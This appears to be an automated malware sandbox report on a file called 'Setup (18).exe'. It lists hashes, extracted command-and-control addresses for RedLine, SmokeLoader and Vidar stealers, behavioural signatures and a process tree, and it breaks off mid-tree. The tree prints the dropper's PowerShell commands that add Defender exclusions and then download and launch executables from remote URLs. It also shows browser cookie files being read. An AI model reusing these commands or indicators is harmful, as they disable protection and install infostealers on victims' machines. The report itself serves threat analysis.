Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    540s
  • max time network
    1781s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (18).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 25 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 28 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 49 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1872
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2788
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          PID:2712
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:5780
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2588
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2536
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1396
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1264
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1196
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:408
                      • C:\Users\Admin\AppData\Roaming\fbtiebg
                        C:\Users\Admin\AppData\Roaming\fbtiebg
                        2⤵
                          PID:6152
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:6308
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:68
                          • C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:652
                            • C:\Users\Admin\Documents\Wh7FuLaGTc259w_7AeFystPC.exe
                              "C:\Users\Admin\Documents\Wh7FuLaGTc259w_7AeFystPC.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3868
                            • C:\Users\Admin\Documents\A40tdYDEbL9VRipX7a8Ol97V.exe
                              "C:\Users\Admin\Documents\A40tdYDEbL9VRipX7a8Ol97V.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3860
                            • C:\Users\Admin\Documents\m5362aZEZeVX23nH45VbpTqT.exe
                              "C:\Users\Admin\Documents\m5362aZEZeVX23nH45VbpTqT.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2548
                              • C:\Users\Admin\AppData\Roaming\2301066.exe
                                "C:\Users\Admin\AppData\Roaming\2301066.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4748
                              • C:\Users\Admin\AppData\Roaming\6820558.exe
                                "C:\Users\Admin\AppData\Roaming\6820558.exe"
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4696
                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4988
                              • C:\Users\Admin\AppData\Roaming\6096500.exe
                                "C:\Users\Admin\AppData\Roaming\6096500.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5044
                            • C:\Users\Admin\Documents\tA_gPJoqfC9pEDyUcqIu9aaR.exe
                              "C:\Users\Admin\Documents\tA_gPJoqfC9pEDyUcqIu9aaR.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3088
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                3⤵
                                  PID:4624
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                    4⤵
                                      PID:5116
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                      4⤵
                                        PID:7148
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                        4⤵
                                          PID:5700
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                          4⤵
                                            PID:8188
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:9920
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:9460
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:10052
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                            4⤵
                                              PID:5964
                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                5⤵
                                                  PID:9724
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                    6⤵
                                                      PID:8300
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                  4⤵
                                                    PID:9412
                                              • C:\Users\Admin\Documents\oVILmUqR5HC6fyHkszKMzBAS.exe
                                                "C:\Users\Admin\Documents\oVILmUqR5HC6fyHkszKMzBAS.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2488
                                              • C:\Users\Admin\Documents\xugqDAdTo2fp94T7v3wZczyU.exe
                                                "C:\Users\Admin\Documents\xugqDAdTo2fp94T7v3wZczyU.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2340
                                                • C:\Users\Admin\Documents\xugqDAdTo2fp94T7v3wZczyU.exe
                                                  C:\Users\Admin\Documents\xugqDAdTo2fp94T7v3wZczyU.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4860
                                              • C:\Users\Admin\Documents\0BZ2KojwyybEgkDQ6g7z3PgO.exe
                                                "C:\Users\Admin\Documents\0BZ2KojwyybEgkDQ6g7z3PgO.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2256
                                                • C:\Users\Admin\Documents\0BZ2KojwyybEgkDQ6g7z3PgO.exe
                                                  C:\Users\Admin\Documents\0BZ2KojwyybEgkDQ6g7z3PgO.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4832
                                              • C:\Users\Admin\Documents\ZAMHiNuec1w5JRnHsCqlb3M2.exe
                                                "C:\Users\Admin\Documents\ZAMHiNuec1w5JRnHsCqlb3M2.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:1236
                                                • C:\Users\Admin\Documents\ZAMHiNuec1w5JRnHsCqlb3M2.exe
                                                  C:\Users\Admin\Documents\ZAMHiNuec1w5JRnHsCqlb3M2.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4840
                                              • C:\Users\Admin\Documents\imGJw0NWT0Ezj2V7sihsHjEX.exe
                                                "C:\Users\Admin\Documents\imGJw0NWT0Ezj2V7sihsHjEX.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1336
                                              • C:\Users\Admin\Documents\LFQ2cn_dXaqgznFqZbDBhtqc.exe
                                                "C:\Users\Admin\Documents\LFQ2cn_dXaqgznFqZbDBhtqc.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:1484
                                              • C:\Users\Admin\Documents\vqm85SfWSfIM1CXludCdWWSP.exe
                                                "C:\Users\Admin\Documents\vqm85SfWSfIM1CXludCdWWSP.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1824
                                                • C:\Users\Admin\Documents\vqm85SfWSfIM1CXludCdWWSP.exe
                                                  "C:\Users\Admin\Documents\vqm85SfWSfIM1CXludCdWWSP.exe"
                                                  3⤵
                                                    PID:1072
                                                • C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe
                                                  "C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:3764
                                                  • C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe
                                                    C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe
                                                    3⤵
                                                      PID:4880
                                                    • C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe
                                                      C:\Users\Admin\Documents\id_WYkak7FRxFA4agPhfKxB2.exe
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:5036
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 160
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:544
                                                  • C:\Users\Admin\Documents\vHCpKwa2axq64zzR_BFXz9g4.exe
                                                    "C:\Users\Admin\Documents\vHCpKwa2axq64zzR_BFXz9g4.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:344
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 760
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4128
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 784
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4684
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 792
                                                      3⤵
                                                      • Program crash
                                                      PID:2164
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 824
                                                      3⤵
                                                      • Program crash
                                                      PID:1840
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 956
                                                      3⤵
                                                      • Program crash
                                                      PID:200
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 984
                                                      3⤵
                                                      • Program crash
                                                      PID:5244
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1012
                                                      3⤵
                                                      • Program crash
                                                      PID:5768
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1420
                                                      3⤵
                                                      • Program crash
                                                      PID:4424
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1384
                                                      3⤵
                                                      • Program crash
                                                      PID:5400
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1516
                                                      3⤵
                                                      • Program crash
                                                      PID:6060
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1700
                                                      3⤵
                                                      • Program crash
                                                      PID:652
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1504
                                                      3⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:2180
                                                  • C:\Users\Admin\Documents\bnxZPsvGD01AqPEwILnU3VKg.exe
                                                    "C:\Users\Admin\Documents\bnxZPsvGD01AqPEwILnU3VKg.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2948
                                                  • C:\Users\Admin\Documents\GZRg0BOAUt1eyZR0VNIB0wcb.exe
                                                    "C:\Users\Admin\Documents\GZRg0BOAUt1eyZR0VNIB0wcb.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:496
                                                  • C:\Users\Admin\Documents\VOAwLYYujdnGZu2AaYPZZPGp.exe
                                                    "C:\Users\Admin\Documents\VOAwLYYujdnGZu2AaYPZZPGp.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2748
                                                  • C:\Users\Admin\Documents\eYt2weqJpqJMS5xydllJC7ln.exe
                                                    "C:\Users\Admin\Documents\eYt2weqJpqJMS5xydllJC7ln.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:188
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 664
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4944
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 712
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4108
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 756
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4320
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 708
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4172
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 1140
                                                      3⤵
                                                      • Program crash
                                                      PID:4388
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 1160
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4656
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 1108
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4328
                                                  • C:\Users\Admin\Documents\ZQjZ8KZJ8EN4qCb3L5aEcjlO.exe
                                                    "C:\Users\Admin\Documents\ZQjZ8KZJ8EN4qCb3L5aEcjlO.exe"
                                                    2⤵
                                                      PID:544
                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:4644
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:4240
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:4880
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:5396
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                            PID:6108
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 4644 -s 1544
                                                            4⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            • Program crash
                                                            PID:4348
                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          PID:4588
                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          PID:4556
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:3176
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1244
                                                      • C:\Users\Admin\Documents\Bl7OXaz1aVguUhTGnj3Zl9tF.exe
                                                        "C:\Users\Admin\Documents\Bl7OXaz1aVguUhTGnj3Zl9tF.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:512
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 660
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4652
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 672
                                                          3⤵
                                                          • Program crash
                                                          PID:1244
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 684
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1820
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 632
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1424
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1128
                                                          3⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3980
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1164
                                                          3⤵
                                                          • Program crash
                                                          PID:4380
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 512 -s 1156
                                                          3⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1600
                                                      • C:\Users\Admin\Documents\RBe762e1rdgFCdbYDR1mKPpa.exe
                                                        "C:\Users\Admin\Documents\RBe762e1rdgFCdbYDR1mKPpa.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3976
                                                      • C:\Users\Admin\Documents\zfh2VRdNCWnh7Koq4ANvKUkh.exe
                                                        "C:\Users\Admin\Documents\zfh2VRdNCWnh7Koq4ANvKUkh.exe"
                                                        2⤵
                                                        • Executes dropped EXE
